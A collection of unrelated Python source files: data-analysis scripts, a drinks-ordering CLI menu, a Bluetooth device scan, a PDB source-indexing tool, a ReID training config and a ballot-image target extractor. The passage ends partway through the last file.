print("mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_patient_edge_weights), np.std(patient_patient_edge_weights), np.max(patient_patient_edge_weights)))
print("(hrs/day) mean, std, max: {:.2f}, {:.2f}, {:.2f}".format(np.mean(patient_patient_edge_weights)* 8 / 60 / 60 / 26, np.std(patient_patient_edge_weights)* 8 / 60 / 60 / 26, np.max(patient_patient_edge_weights)* 8 / 60 / 60 / 26))
df_additional_statistics = pd.DataFrame(data=statistic_array, index=index_list, columns=column_name)
df_additional_statistics.to_csv("tables/statistics/additional_network_statistics.csv")
|
def print_menu(APP_NAME):
print(f'''
Welcome to {APP_NAME}!
____
| _ \ /\
| |_) | _ __ ___ __ __ / \ _ __ _ __
| _ < | '__|/ _ \ \ \ /\ / / / /\ \ | '_ \ | '_ \
| |_) || | | __/ \ V V / / ____ \ | |_) || |_) |
|____/ |_| \___| \_/\_/ /_/ \_\| .__/ | .__/
| | | |
|_| |_|
Please select an option by entering a number
\t[1] Display Names on your Table
\t[2] Display Drinks Menu
\t[3] Display Preferences
\t[4] Add People
\t[5] Add Drink
\t[6] Set a Preference
\t[7] Order a Round
\t[8] Close Application
''')
def table(title, data): #Prints out table of data
width = get_width(title, data)
banner = (f" +{'=' * width}+")
print(f"{banner}\n |{title.upper()}{' ' * (width - len(title))}| \n{banner}")
for item in data:
print(f" |{item}{' ' * (width - len(item))}|" )
print(f"{banner}\n")
def get_width(title, data):
longest = len(title)
for item in data:
if len(item) > longest:
longest = len(item)
return longest + 1
def long_table(title, data):
width = get_width(title, data)
banner = (f" +{'=' * width}+")
print(f"{banner}\n |{title.upper()}{' ' * (width - len(title))}|\n{banner}")
for key, value in data.items():
print(f" |{key}: {value}{' ' * (width - len(value) - len(key)-2)}|")
print(f"{banner}\n") |
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 07 11:54:54 2019
@author: bmdoekemeijer
"""
import numpy as np
import time
import os
import sys
sys.path.insert(0, 'bin')
from mergeVTKs import averageCellDataSliceDataInst
# Read all files
averaging_lb = 10400; # Lower limit
averaging_ub = np.Inf; # Upper limit
folderName = 'sdn_yaw<yaw1>_yaw<yaw2>'
sliceDataInstDir = '/marconi_scratch/userexternal/bdoekeme/sediniCases/neutral_runs/runs/' + folderName + '/postProcessing/sliceDataInstantaneous'
averageCellDataSliceDataInst(sliceDataInstDir,averaging_lb,averaging_ub) |
class StartPage:
_skip_button = ".//android.widget.Button[@text = 'SKIP']"
def get_skip_button(self):
return self._skip_button
|
"""
Kara Shibley and Griffin Reichmuth
CSE 160 AC
This file plots various sections of the data and runs a random forest
regressor to predict county level movement.
"""
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble.forest import RandomForestRegressor
import plotly.express as px
# Import data and keep columns for retail data
data = pd.read_csv("features_labels_rf")
data = data.drop(['Unnamed: 0',
'grocery_and_pharmacy_percent_change_from_baseline',
'parks_percent_change_from_baseline',
'transit_stations_percent_change_from_baseline',
'workplaces_percent_change_from_baseline',
'residential_percent_change_from_baseline'], axis=1)
rec_retail = 'retail_and_recreation_percent_change_from_baseline'
groc_pharm = 'grocery_and_pharmacy_percent_change_from_baseline'
parks = 'parks_percent_change_from_baseline'
transit = 'transit_stations_percent_change_from_baseline'
workplaces = 'workplaces_percent_change_from_baseline'
residential = 'residential_percent_change_from_baseline'
# Plot all the data
all_counties = px.line(data, x="date", y=rec_retail, color="County name",
line_group="County name", hover_name="County name")
all_counties.show()
# Plot data based on feature importance
gov_plot = px.scatter(data, x="date", y=rec_retail,
color='g_Candidate_Jay Inslee',
color_continuous_scale=[(0, "red"), (1, "blue")],
hover_name="County name",
title="Gubernatorial Race")
gov_plot.show()
pres_plot = px.scatter(data, x="date", y=rec_retail,
color='p_Candidate_Donald J. Trump / Michael R. Pence',
color_continuous_scale=[(0, "blue"), (1, "red")],
hover_name="County name",
title="Presidential Race")
pres_plot.show()
# data for US and WA
us_data = pd.read_csv("US")
wa_mobility = us_data[us_data["sub_region_1"] == 'Washington']
us_data['date'] = pd.to_datetime(us_data['date'])
wa_mobility['date'] = pd.to_datetime(wa_mobility['date'])
# Sort data by movement type and find the daily average movement
# from the baseline by grouping by date
# recreation and retail
rec_retail_us = us_data.groupby("date")[rec_retail].mean()
rec_retail_wa = wa_mobility.groupby("date")[rec_retail].mean()
# grocery and pharmacy
groc_pharm_us = us_data.groupby("date")[groc_pharm].mean()
groc_pharm_wa = wa_mobility.groupby("date")[groc_pharm].mean()
# parks
parks_us = us_data.groupby("date")[parks].mean()
parks_wa = wa_mobility.groupby("date")[parks].mean()
# transit
transit_us = us_data.groupby("date")[transit].mean()
transit_wa = wa_mobility.groupby("date")[transit].mean()
# workplaces
workplaces_us = us_data.groupby("date")[workplaces].mean()
workplaces_wa = wa_mobility.groupby("date")[workplaces].mean()
# residential
residential_us = us_data.groupby("date")[residential].mean()
residential_wa = wa_mobility.groupby("date")[residential].mean()
# plot mobility data US vs WA
fig, [[ax1, ax2, ax3], [ax4, ax5, ax6]] = \
plt.subplots(2, figsize=(25, 15), ncols=3)
rec_retail_wa.plot(x='date', y=rec_retail, legend=True, label="WA", ax=ax1)
rec_retail_us.plot(x='date', y=rec_retail, legend=True, label="US", ax=ax1)
ax1.set_title('Recreation and Retail Percent Change from Baseline')
groc_pharm_wa.plot(x='date', y=groc_pharm, legend=True, label="WA", ax=ax2)
groc_pharm_us.plot(x='date', y=groc_pharm, legend=True, label="US", ax=ax2)
ax2.set_title('Grocery and Pharmacy Percent Change from Baseline')
parks_wa.plot(x='date', y=parks, legend=True, label="WA", ax=ax3)
parks_us.plot(x='date', y=parks, legend=True, label="US", ax=ax3)
ax3.set_title('Parks Percent Change from Baseline')
transit_wa.plot(x='date', y=transit, legend=True, label="WA", ax=ax4)
transit_us.plot(x='date', y=transit, legend=True, label="US", ax=ax4)
ax4.set_title('Transit Percent Change from Baseline')
workplaces_wa.plot(x='date', y=workplaces, legend=True, label="WA", ax=ax5)
workplaces_us.plot(x='date', y=workplaces, legend=True, label="US", ax=ax5)
ax5.set_title('Workplace Percent Change from Baseline')
residential_wa.plot(x='date', y=residential, legend=True, label="WA", ax=ax6)
residential_us.plot(x='date', y=residential, legend=True, label="US", ax=ax6)
ax6.set_title('Residential Percent Change from Baseline')
plt.savefig("US vs. WA.png")
# Set date as the index
data['date'] = pd.to_datetime(data['date'])
data = data.set_index('date')
train_dates = data.loc["2020-03-23": '2020-04-13'].drop("County name", axis=1)
test_dates = data.loc["2020-04-27": '2020-05-18'].drop("County name", axis=1)
# Random Forest model
RF_Model = RandomForestRegressor(n_estimators=100,
max_features=1, oob_score=True)
# RF for group 2
features_train = train_dates.loc[:, train_dates.columns != rec_retail]
labels_train = train_dates[rec_retail]
rgr = RF_Model.fit(features_train, labels_train)
features_test = test_dates.loc[:, test_dates.columns != rec_retail]
labels_test = test_dates[rec_retail]
rgr_predict = rgr.predict(features_test)
rgr_error = abs(rgr_predict - labels_test)
print(rgr_error)
print(rgr_error.mean())
|
import random
import os
try:
# Create target Directory
os.mkdir("testcases")
except FileExistsError:
pass
os.system("g++ code/sol.cpp -o sol.out")
UPPER = 2**31 - 1
LOWER = -2**31
for i in range(1, 21):
fin = os.path.join("testcases", f"{i}.in")
fout = os.path.join("testcases", f"{i}.out")
a = random.randint(LOWER, UPPER)
b = random.randint(LOWER, UPPER)
if not LOWER <= a + b <= UPPER:
print("YEAHHH")
with open(fin, "w") as f:
print(a, b, file=f)
os.system(f"./sol.out < {fin} > {fout}")
os.system("rm sol.out") |
import bluetooth
print "looking for nearby devices..."
nearby_devices = bluetooth.discover_devices(lookup_names = True)
print "found %d devices" % len(nearby_devices)
for addr, name in nearby_devices:
print " %s - %s" % (addr, name)
|
#!/usr/bin/env python3
#
#-------------------------------------------------------------------------------
import argparse
import datetime
import os
import re
import shutil
import sys
import textwrap
import time
import libSrcTool
import prepPDB
import simur
MY_NAME = os.path.basename(__file__)
DEFAULT_SRCSRV = 'C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/srcsrv'
DESCRIPTION = f"""
Index the PDB files in the --target_dir, taking the information from the
{simur.VCS_CACHE_PATTERN} files found under the --processed_dir:s
--srcsrv_dir may for example be (if you have it on a server)
//seupp-s-rptmgr/ExternalAccess/IndexingServices/WinKit10Debuggers/srcsrv
or (if you have it locally)
C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/srcsrv
"""
USAGE_EXAMPLE = f"""
Example:
> {MY_NAME} -t D:/src/rl78_trunk/rl78/intermediate/build_Win32_14
-p D:/src/rl78_trunk/core/ide/lib/Release
-s //seupp-s-rptmgr/ExternalAccess/IndexingServices/WinKit10Debuggers/srcsrv
"""
#-------------------------------------------------------------------------------
def parse_arguments():
parser = argparse.ArgumentParser(
MY_NAME,
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent(DESCRIPTION),
epilog=textwrap.dedent(USAGE_EXAMPLE)
)
add = parser.add_argument
add('-b', '--backup', action='store_true',
help='make a backup of the .pdb file as <path>.orig')
add('-c', '--cvdump_path', metavar='cvdump.exe',
default='cvdump.exe',
help='path to cvdump.exe (unless it is in the --srcsrv_dir directory)')
add('-d', '--debug_level', type=int, default=0, help='set debug level')
add('-l', '--lower_case_pdb', action='store_true',
help='handle old PDBs (< VS2019) that stored paths in lower case')
add('-p', '--processed_dir', metavar='processed-dir1{;dir2;dir4}',
help='fetch *.simur.json from preprocessed PDB directories')
add('-q', '--quiet', action='store_true',
help='be more quiet')
add('-s', '--srcsrv_dir', metavar='srcsrv',
default=DEFAULT_SRCSRV,
help='WinKits srcsrv directory')
add('-t', '--target_dir', metavar='stage-dir',
required=True,
help='root path to index (recursively)')
add('-u', '--under_test', metavar='the.pdb',
help='index only this pdb file')
add('-v', '--verbose', action='store_true',
help='be more verbose')
return parser.parse_args()
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def list_all_files(directory, ext):
the_chosen_files = []
for root, _dirs, files in os.walk(directory):
for file in files:
if file.endswith(ext):
the_chosen_files.append(os.path.join(root, file))
return the_chosen_files
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def filter_pdbs(pdbs, cvdump, srcsrv, options):
    """Split *pdbs* into library PDBs and executable PDBs.

    A PDB whose srctool listing is non-empty belongs to an executable;
    otherwise, if *cvdump* is available and reports source files, the PDB
    is treated as a library PDB. Compiler-internal vcNNN.pdb files are
    skipped entirely. Returns (lib_pdbs, exe_pdbs).
    """
    lib_pdbs = []
    exe_pdbs = []
    for pdb_file in pdbs:
        # The default vcNNN.pdb files come from the compiler itself - skip.
        if re.match(r'.*\\vc\d+\.pdb$', pdb_file):
            print(f'Skipping {pdb_file}')
            continue
        # Any srctool output means this is NOT a lib-PDB.
        if prepPDB.get_non_indexed_files(pdb_file, srcsrv, options):
            exe_pdbs.append(pdb_file)
            continue
        # Without cvdump we cannot classify library PDBs at all.
        if not cvdump:
            continue
        raw_data, _exit_code = simur.run_process([cvdump, pdb_file], True)
        # Only PDBs that actually contain source files count as libraries.
        if libSrcTool.process_raw_cvdump_data(raw_data):
            lib_pdbs.append(pdb_file)
    return lib_pdbs, exe_pdbs
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def accumulate_processed(options):
    """Gather vcs exports from already-processed PDB directories.

    Walks every directory in the ';'-separated ``options.processed_dir``,
    loads each file matching ``simur.VCS_CACHE_PATTERN`` ('.simur.json')
    and merges its contents into one dictionary, which is returned.
    """
    vcs_imports = {}
    cache_files = []
    for root_dir in options.processed_dir.split(';'):
        cache_files += list_all_files(root_dir, simur.VCS_CACHE_PATTERN)
    for cache_file in cache_files:
        if options.verbose:
            print(f'Take vcs exports from {cache_file}')
        vcs_imports.update(simur.load_json_data(cache_file))
    return vcs_imports
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def get_available_bins(bins_in):
    """Resolve each binary name in *bins_in* via the PATH, falling back to
    the directory containing this script. Returns (found_paths, missing_names)."""
    found = []
    missing = []
    script_dir = os.path.dirname(os.path.abspath(__file__))
    for candidate in bins_in:
        # Second which() call searches next to this script only.
        located = shutil.which(candidate) or shutil.which(candidate, path=script_dir)
        if located is None:
            missing.append(candidate)
        else:
            found.append(located)
    return found, missing
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def make_time_string(elapsed):
    """Render *elapsed* seconds: plain "<n> secs" up to a minute,
    H:MM:SS (via timedelta) for anything longer."""
    if elapsed <= 60:
        return f'{elapsed} secs'
    return str(datetime.timedelta(seconds=elapsed))
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def make_log(srcsrv, explicit_cvdump, elapsed):
    """Print a provenance log: who ran the indexing, where, how long it
    took, and the exact binaries (with file versions) that were used.

    srcsrv          -- WinKits srcsrv directory holding srctool/pdbstr
    explicit_cvdump -- path to cvdump.exe as given on the command line
    elapsed         -- wall-clock duration in seconds
    """
    bins_used = [
        sys.executable,
        os.path.join(srcsrv, 'srctool.exe'),
        os.path.join(srcsrv, 'pdbstr.exe'),
    ]
    maybe_bins = [
        explicit_cvdump,
        'git.exe',
        'svn.exe',
        'hg.exe'
    ]
    found_bins, unfound_bins = get_available_bins(maybe_bins)
    bins_used += found_bins
    print(f'Executed by : {os.getenv("USERNAME")}')
    print(f' on machine : {os.getenv("COMPUTERNAME")}')
    print(f' SIMUR_REPO_CACHE: {os.getenv("SIMUR_REPO_CACHE")}')
    print(f' elapsed time : {make_time_string(elapsed)}')
    codepage, _exit_code = simur.run_process('cmd /c CHCP', False)
    # CHCP prints e.g. "Active code page: 850" - keep only the number.
    the_cp = re.match(r'^.*:\s+(\d*)$', codepage)
    if the_cp:
        codepage = the_cp.group(1)
    print(f' CodePage : {codepage}')
    print('Script:')
    print(f' {os.path.realpath(sys.argv[0])}')
    print('Using binaries:')
    for the_exe in bins_used:
        # BUGFIX: every entry in bins_used is already a resolved path
        # (sys.executable, which() results, or srcsrv joins above); the old
        # extra os.path.join(srcsrv, the_exe) double-prefixed relative srcsrv.
        print(f' {the_exe}:')
        props = simur.getFileProperties(the_exe)
        if props:
            print(f' {props["StringFileInfo"]["FileVersion"]}')
            print(f' {props["FileVersion"]}')
    if unfound_bins:
        print('Binaries not found/used:')
        for the_exe in unfound_bins:
            print(f' {the_exe}:')
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
def main():
    """Drive the source indexing run.

    Finds all PDBs under --target_dir, classifies them as library or
    executable PDBs, source-indexes each one, then writes the vcs caches
    and a provenance log next to the indexed tree.

    Returns a process exit code: 0 on full success, 3 on setup/argument
    failure, otherwise the accumulated per-PDB failure count.
    """
    options = parse_arguments()
    start = time.time()
    root = options.target_dir
    cvdump = options.cvdump_path
    srcsrv = options.srcsrv_dir
    debug_level = options.debug_level
    # A truthy return means the WinKits tools are missing/unusable.
    if prepPDB.check_winkits(srcsrv, options):
        return 3
    # found_cvdump is the usable cvdump path, or falsy when unavailable.
    found_cvdump = libSrcTool.check_cvdump(cvdump, srcsrv)
    pdbs = list_all_files(root, ".pdb")
    if len(pdbs) == 0:
        print(f'No PDB:s found in directory {root}')
        return 3
    # If there is no cvdump, then we won't filter out any lib_pdb:s either
    lib_pdbs, exe_pdbs = filter_pdbs(pdbs, found_cvdump, srcsrv, options)
    # --under_test - only process an explicit pdb file
    if options.under_test:
        if options.under_test in exe_pdbs:
            lib_pdbs = []
            exe_pdbs = [options.under_test]
        else:
            print(f'Could not find {options.under_test} in directory {root}')
            return 3
    outcome = 0
    vcs_cache = {}
    svn_cache = {}
    git_cache = {}
    vcs_imports = {}
    # If anything from options.processed_dir (-p), then take their
    # outputs (vcs_cache) and use as imports
    if options.processed_dir:
        vcs_imports = accumulate_processed(options)
    # Library PDBs can only be processed when cvdump is available.
    if found_cvdump:
        for lib_pdb in lib_pdbs:
            print(f'---\nProcessing library {lib_pdb}')
            outcome += prepPDB.prep_lib_pdb(lib_pdb,
                                            srcsrv,
                                            found_cvdump,
                                            vcs_cache,
                                            vcs_imports,
                                            svn_cache,
                                            git_cache,
                                            options)
    for exe_pdb in exe_pdbs:
        print(f'---\nProcessing executable {exe_pdb}')
        outcome += prepPDB.prep_exe_pdb(exe_pdb,
                                        srcsrv,
                                        vcs_cache,
                                        vcs_imports,
                                        svn_cache,
                                        git_cache,
                                        options)
    end = time.time()
    make_log(srcsrv, cvdump, end - start)
    # Store the directories where we found our 'roots'
    # This can be used for checking if we have un-committed changes
    roots = {}
    roots["svn"] = prepPDB.extract_repo_roots(svn_cache)
    roots["git"] = prepPDB.extract_repo_roots(git_cache)
    repo_file = os.path.join(root, 'repo_roots.json')
    simur.store_json_data(repo_file, roots)
    cache_file = os.path.join(root, simur.VCS_CACHE_FILE_NAME)
    simur.store_json_data(cache_file, vcs_cache)
    # Debug-only dumps of the raw per-VCS caches.
    if debug_level > 4:
        svn_file = os.path.join(root, 'svn_cache.json')
        simur.store_json_data(svn_file, svn_cache)
        git_file = os.path.join(root, 'git_cache.json')
        simur.store_json_data(git_file, git_cache)
    return outcome
#-------------------------------------------------------------------------------
#
#-------------------------------------------------------------------------------
# Script entry point: main()'s accumulated outcome doubles as the exit code.
if __name__ == "__main__":
    sys.exit(main())
|
# -*- coding: utf-8 -*-
# @Author: solicucu
from yacs.config import CfgNode as CN
# Root of the default configuration tree for ReID training;
# individual values are overridden from YAML files / command line.
_C = CN()
#------------------------------
# MODEL
# config for model parameters
#------------------------------
_C.MODEL = CN()
# use GPU or CPU for the training
_C.MODEL.DEVICE = 'cpu'
# specify the GPU(s) to be used if using GPU
_C.MODEL.DEVICE_IDS = '0'
# name of the backbone
_C.MODEL.NAME = 'cdnet'
# load the specified checkpoint for the model (self-pretrained)
_C.MODEL.PRETRAIN_PATH = ''
# load the ImageNet checkpoint which we trained
_C.MODEL.IMAGENET_CKPT = ''
# whether to separate the features used for triplet loss and softmax loss
_C.MODEL.USE_BNNECK = False
# whether to use DataParallel
_C.MODEL.PARALLEL = False
# for scaling the model width: x1, x2, x1.5
_C.MODEL.WIDTH_MULT = 1.
# specify the number of cells in each stage
_C.MODEL.STAGES = [2, 2, 2, 2]
# specify the channels in each stage
_C.MODEL.PLANES = [32, 64, 128, 256]
# model genotype path for CDNet/CNet
_C.MODEL.GENOTYPE = 'best_genotype.json'
# neck type
_C.MODEL.NECK_TYPE = "stdneck"
# whether to use adaptive fusion
_C.MODEL.ADAPTION_FUSION = False
# dim list used to construct the fc layers before the classifier
_C.MODEL.FC_DIMS = []
#--------------------------------
# DATA
# preprocessing of the data
#--------------------------------
_C.DATA = CN()
# which dataset to use for training
_C.DATA.DATASET = "market1501"
# path to dataset
_C.DATA.DATASET_DIR = "D:/project/data/"
# _C.DATA.DATASET_DIR = "/home/share/solicucu/data/"
# size of the image during the training (height, width)
_C.DATA.IMAGE_SIZE = [256,128]
# the probability of a random horizontal image flip
_C.DATA.HF_PROB = 0.5
# the probability of random image erasing
_C.DATA.RE_PROB = 0.5
# RGB means used for image normalization
_C.DATA.MEAN = [0.485, 0.456, 0.406]
# RGB stds used for image normalization
_C.DATA.STD = [0.229, 0.224, 0.225]
# value of the padding size
_C.DATA.PADDING = 10
# cutout size; 0 disables cutout (inference used cutout=16)
_C.DATA.CUTOUT = 0
#--------------------------------
# DATALOADER
#--------------------------------
_C.DATALOADER = CN()
# number of data loading threads
_C.DATALOADER.NUM_WORKERS = 4
# type of Sampler for data loading
_C.DATALOADER.SAMPLER = 'triplet'
# number of instances per single person (identity)
_C.DATALOADER.NUM_INSTANCE = 4
#--------------------------------
# SOLVER
#--------------------------------
_C.SOLVER = CN()
# total number of epochs for training
_C.SOLVER.MAX_EPOCHS = 120
# number of images per batch
_C.SOLVER.BATCH_SIZE = 64
# learning rate
# the initial learning rate
_C.SOLVER.BASE_LR = 0.025
# the period of learning-rate decay for StepLR
_C.SOLVER.LR_DECAY_PERIOD = 10
# learning rate decay factor
_C.SOLVER.LR_DECAY_FACTOR = 0.1
# lr scheduler [StepLR, CosineAnnealingLR, WarmupMultiStepLR]
_C.SOLVER.LR_SCHEDULER_NAME = "StepLR"
# min_lr for CosineAnnealingLR
_C.SOLVER.LR_MIN = 0.001
# for WarmupMultiStepLR
# the epochs at which the lr changes
_C.SOLVER.MILESTONES = [40, 70]
# lr list for the multistep schedule
_C.SOLVER.LR_LIST = [3.5e-4, 3.5e-5, 3.5e-6]
# coefficient for linear warmup
_C.SOLVER.GAMA = 0.
# used to calculate the start lr: init_lr = base_lr * warmup_factor
_C.SOLVER.WARMUP_FACTOR = 1.
# how many epochs to warm up; 0 means no warmup
_C.SOLVER.WARMUP_ITERS = 0
# method for warmup
_C.SOLVER.WARMUP_METHOD = 'linear'
# optimizer
# the name of the optimizer
_C.SOLVER.OPTIMIZER_NAME = "SGD"
# momentum for SGD
_C.SOLVER.MOMENTUM = 0.9
# weight decay
_C.SOLVER.WEIGHT_DECAY = 0.0005
# loss
# loss type: softmax, triplet, softmax_triplet
_C.SOLVER.LOSS_NAME = "softmax"
# the margin for triplet loss
_C.SOLVER.TRI_MARGIN = 0.3
# clip the gradient if grad_clip is not zero
_C.SOLVER.GRAD_CLIP = 0.
#--------------------------------
# OUTPUT
#--------------------------------
_C.OUTPUT = CN()
# path to output
_C.OUTPUT.DIRS = "D:/project/data/ReID/ReIDModels/cdnet/market1501/"
# path (relative to DIRS) where checkpoints are saved
_C.OUTPUT.CKPT_DIRS = "checkpoints/cdnet_fblneck/"
# specify a file name for the log
_C.OUTPUT.LOG_NAME = "log_cdnet_fblneck.txt"
# the period (iterations) for logging
_C.OUTPUT.LOG_PERIOD = 10
# the period (epochs) for saving the checkpoint
_C.OUTPUT.CKPT_PERIOD = 10
# the period (epochs) for validation
_C.OUTPUT.EVAL_PERIOD = 10
#--------------------------------
# TRICKS
# set some training tricks here
#--------------------------------
# tricks
_C.TRICKS = CN()
# use label smoothing to prevent overfitting
_C.TRICKS.LABEL_SMOOTH = False
# specify the dropout probability
_C.TRICKS.DROPOUT = 0.
#--------------------------------
# TEST
#--------------------------------
_C.TEST = CN()
# batch size for test
_C.TEST.IMGS_PER_BATCH = 128
# whether the feature is normalized before test
_C.TEST.FEAT_NORM = 'yes'
# the name of the best checkpoint to use for test
_C.TEST.BEST_CKPT = ''
|
# Written by Chuguan Tian for COMP9021
# Insert your code here
import sys
from collections import defaultdict
import copy
# Prompt for the data file; abort with a message if it is missing or empty.
file_name = input('Which data file do you want to use?')
try:
    data_file = open(file_name)
    data = data_file.readlines()
    if data == []:
        # An empty file counts as bad input; handled by the ValueError branch.
        # (BUGFIX: removed an unreachable sys.exit() that followed this raise.)
        raise ValueError
except IOError:
    print('Incorrect input!')
    sys.exit()
except ValueError:
    print('Incorrect input, giving up!')
    sys.exit()
data_file.close()
# read data: each line looks like "R(a,b)"; strip the decoration
# characters, split on whitespace, and convert every token to int,
# producing path = [[a, b], ...].
path = []
for line in data:
    cleaned = line.replace('R', '').replace('(', '').replace(',', ' ').replace(')', '')
    path.append([int(token) for token in cleaned.split()])
#get the number linked to each point
##path_each_point = defaultdict(list)
##for i in path:
## path_each_point[i[1]].append(i[0])
##print('path_each_point',path_each_point)
##for i in path_each_point.keys():
## print('i',i)
## for j in path_each_point.keys():
## print('j',j)
## for k in range(len(j)):
## if i == path_each_point[j][k]:
## path_each_point[i].append
## print(path_each_point[i][-1])
def path_f(M,L,P,count):
    """Grow the edge chain P (mutated in place) starting from edge M.

    M     -- current edge as [src, dst]
    L     -- full list of edges (callers pass the global `path`)
    P     -- accumulator holding the chain built so far
    count -- recursion budget checked against len(L)-len(P)-1

    NOTE(review): the loop iterates the module-global `path`, not the L
    parameter, and the recursion assumes the input contains no cycles -
    confirm against the assignment spec before changing.
    """
##    print('count',count)
    if P == []:
        P.append(M)
    # Look for an edge whose source matches M's destination.
    for i in path:
##        print('\ni',i)
        if M[1] == i[0]:
            P.append(i)
##            print('P',P)
            # Continue the chain from the newly appended edge.
            return path_f(P[-1],L,P,count)
        # Budget exhausted: give up extending and return what we have.
        if count > len(L)-len(P)-1:
            return P
        else:
            continue
    # No continuation found on this pass; retry with a larger budget
    # unless P is still just the starting edge.
    if len(P) == 1:
        return P
    else:
##        flg = copy.deepcopy(P[-1])
##        print('P[-1]',P[-1])
##        P_cp = copy.deepcopy(P[-1])
        return path_f(P[-1],L,P,count+1)
# Build, for every edge, the chain reachable from it.
path_each_point = []
for i in path:
    sub_path = []
    count = 0
    path_f(i,path,sub_path,count)
    path_each_point.append(sub_path)
##    print('sub_path',sub_path)
##print('path_each_point',path_each_point)
##path_cp = copy.deepcopy(path)
##path_list = []
##for i in path:
##    sub_path = []
##    sub_path.append(i)
##    print('\ni',i)
##    for j in path:
##        print('j',j)
##        if i == j:
##            continue
##        elif i[1] == j[0]:
##            sub_path.append(j)
##        else:
##            continue
##    print('sub_path',sub_path)
##    path_list.append(sub_path)
##print('path_list',path_list)
#sort the path
# Keep an unmodified snapshot so we can iterate it while pruning the original.
path_each_point_cp = copy.deepcopy(path_each_point)
# Find the longest chain; it is kept whole and used as the pruning reference.
# NOTE(review): longest_path stays unbound if path_each_point is empty.
length = 0
for i in range(len(path_each_point)):
    if len(path_each_point[i]) > length:
        length = len(path_each_point[i])
        longest_path = path_each_point[i]
##print('longest_path',longest_path)
# Collect every node appearing in the longest chain (-1 is a seed sentinel).
longest_set = {-1}
#longest_path set
for i in longest_path:
    longest_set.add(i[0])
    longest_set.add(i[1])
##print('longest_set',longest_set)
# Pass 1: drop edges that already appear in the longest chain.
for i in range(len(path_each_point_cp)):
##    print('i',i)
    if path_each_point_cp[i] != longest_path:
        for k in path_each_point_cp[i]:
##            print('k',k)
            if k in longest_path:
                path_each_point[i].remove(k)
            else:
                continue
##print('path_each_point',path_each_point)
# Pass 2: drop edges ending at the same node the longest chain ends at.
# NOTE(review): this loop removes from the same list it iterates, which
# skips the element after each removal - confirm this is intended.
for i in range(len(path_each_point_cp)):
##    print('i',i)
    if path_each_point_cp[i] != longest_path:
        for k in path_each_point[i]:
##            print('k',k)
            if k != [] and longest_path[-1][-1] == k[-1]:
                path_each_point[i].remove(k)
            else:
                continue
##print('path_each_point',path_each_point)
# Pass 3: drop edges whose both endpoints lie on the longest chain
# (same remove-while-iterating caveat as pass 2).
for i in range(len(path_each_point_cp)):
    if path_each_point_cp[i] != longest_path:
        for k in path_each_point[i]:
            if k[0] in longest_set and k[-1] in longest_set:
                path_each_point[i].remove(k)
            else:
                continue
##print('path_each_point',path_each_point)
# Remove chains that became empty (one per snapshot entry at most).
for i in range(len(path_each_point_cp)):
    if [] in path_each_point:
        path_each_point.remove([])
##print('path_each_point',path_each_point)
#print the path
# Flatten the surviving chains into a single list of edges.
path_print_list = []
for i in path_each_point:
    for j in i:
        path_print_list.append(j)
##print('path_print_list',path_print_list)
# Restore the original input order for the output.
path_print_list_sorted = []
for i in path:
    if i in path_print_list:
        path_print_list_sorted.append(i)
##print('path_print_list_sorted',path_print_list_sorted)
#transfer to print
print('The nonredundant facts are:')
for i in path_print_list_sorted:
    t = str(i).replace('[','').replace(']','').replace(' ','')
    print(f'R({t})')
|
from scipy import misc,ndimage
from shared import *
from imagesAlign import *
import csv
import os
import string
import sys
def maskImage(I,csvFile):
    """Return a copy of *I* with an expanded region around every voting
    target set to NaN, so those pixels are ignored during alignment.

    I       -- 2D grayscale ballot image (numpy array)
    csvFile -- target-definition CSV; the first row is a header
    """
    Iout=np.copy(I);
    bdReader=csv.reader(open(csvFile,'r'))
    isFirst=True; pFac=.1;  # pFac: padding factor around each target
    # loop over every target location
    for row in bdReader:
        # skip the CSV header row
        if isFirst:
            isFirst=False;
            continue
        # rows flagged as contests carry no voting target
        # (int() replaces Py2-only string.atoi; identical for decimal input)
        isContest=int(row[7]);
        if isContest==1:
            continue
        # bounding box: columns 2/3 give x1/y1, columns 4/5 width/height
        x1=int(row[2]); x2=x1+int(row[4]);
        y1=int(row[3]); y2=y1+int(row[5]);
        # expand region around target, clipped to the image bounds
        # (use I.shape for both axes; the original mixed I and its copy Iout,
        # which are the same shape - normalized to match extractTargets)
        (rOut,rOff)=expand(y1,y2,x1,x2,I.shape[0],I.shape[1],pFac)
        Iout[rOut[0]:rOut[1],rOut[2]:rOut[3]]=np.nan;
    return Iout;
def extractTargets(I,Iref,csvFile):
    ''' Perform local alignment around each target, then crop out target '''
    # I       -- ballot image to extract targets from
    # Iref    -- blank reference ballot; masked so targets don't bias alignment
    # csvFile -- target-definition CSV; the first row is a header
    bdReader=csv.reader(open(csvFile,'r'))
    IrefM=maskImage(Iref,csvFile);
    result = []
    isFirst=True; pFac=2;  # pFac: padding factor for the local alignment window
    # loop over every target location
    for row in bdReader:
        # skip the CSV header row
        if isFirst:
            isFirst=False;
            continue
        # rows flagged as contests carry no voting target
        # (int() replaces Py2-only string.atoi; identical for decimal input)
        isContest=int(row[7]);
        if isContest==1:
            continue
        # bounding box: columns 2/3 give x1/y1, columns 4/5 width/height
        x1=int(row[2]); x2=x1+int(row[4]);
        y1=int(row[3]); y2=y1+int(row[5]);
        # expand region around target
        (rOut,rOff)=expand(y1,y2,x1,x2,I.shape[0],I.shape[1],pFac)
        I1=I[rOut[0]:rOut[1],rOut[2]:rOut[3]];
        Iref1=IrefM[rOut[0]:rOut[1],rOut[2]:rOut[3]];
        # align the padded patch, then crop the aligned target out of it
        IO=imagesAlign(I1,Iref1)
        targ=IO[1][rOff[0]:rOff[1],rOff[2]:rOff[3]];
        result.append(targ)
    return result
def convertImages(csvP, IrefP, ballotD):
    """Walk *ballotD* for .jpg ballots, determine each one's orientation by
    aligning it (and its 180-degree rotation) against the blank reference,
    then extract the voting targets.

    NOTE(review): the return statement sits outside the walk loops, so only
    the orientation result (Iin) of the LAST jpg processed is used, and Iin
